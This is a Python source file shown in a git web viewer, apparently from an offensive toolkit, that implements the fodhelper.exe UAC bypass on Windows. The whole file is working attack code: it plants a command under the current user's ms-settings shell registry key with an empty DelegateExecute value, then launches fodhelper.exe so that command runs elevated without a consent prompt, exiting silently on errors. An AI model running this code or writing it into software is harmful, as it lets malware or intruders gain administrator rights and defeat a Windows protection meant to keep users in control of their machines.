summaryrefslogtreecommitdiff
path: root/Specific/uac_bypass.py
blob: a8df66269d3098fe92f7d8ec77061a068f0dbb70 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import winreg
import ctypes
import time
import os

from sys import exit

FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'


def is_running_as_admin(): 
  try:
    return ctypes.windll.shell32.IsUserAnAdmin()
  except:
    return False


def create_reg_key(key, value):
  try:        
    winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
    registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                
    winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
    winreg.CloseKey(registry_key)
  except WindowsError:        
    exit(0)


def bypass_uac(cmd, timeout=2.5):
  try:
    time.sleep(timeout)
    create_reg_key(DELEGATE_EXEC_REG_KEY, '')
    create_reg_key(None, cmd)
  except WindowsError:
    exit(0)


def Bypass(path):
  try:
    bypass_uac(path)
    os.system(FOD_HELPER)
  except WindowsError:
    exit(0)